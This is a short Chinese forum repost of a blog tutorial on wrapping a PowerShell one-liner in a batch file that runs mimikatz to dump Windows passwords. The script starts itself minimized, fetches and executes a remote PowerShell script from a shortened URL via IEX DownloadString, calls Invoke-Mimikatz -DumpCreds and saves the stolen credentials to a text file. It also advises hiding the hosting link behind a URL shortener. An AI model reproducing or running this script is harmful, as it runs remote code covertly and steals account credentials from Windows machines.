一句话powershell调用mimikatz抓取Windows密码

mimikatz简要介绍

这篇文章一句powershell调用mimikatz抓密码中提到了这种方法

个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动

实际使用:

如果你下载不了说明你被墙了

  • 复制访问链接如(http://x.x.x.x/getpass.ps1) 然后使用短网址生成器短链接

  • 编写bat脚本,第四行的链接地址应为你自己存放ps1脚本的地址

@echo off
if not "%~1"=="p" start /min cmd.exe /c %0 p&exit
cd /d %~dp0
powershell "IEX (New-Object Net.WebClient).DownloadString('http://kks.me/a5x'); Invoke-Mimikatz -DumpCreds">>1.txt

  • @echo off 不回显
  • 最小化批处理进程
  • 切换到脚本路径
  • 使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中

*来自AresX’s Blog

1 个赞

服务器资源由ZeptoVM赞助

Partners Wiki Discord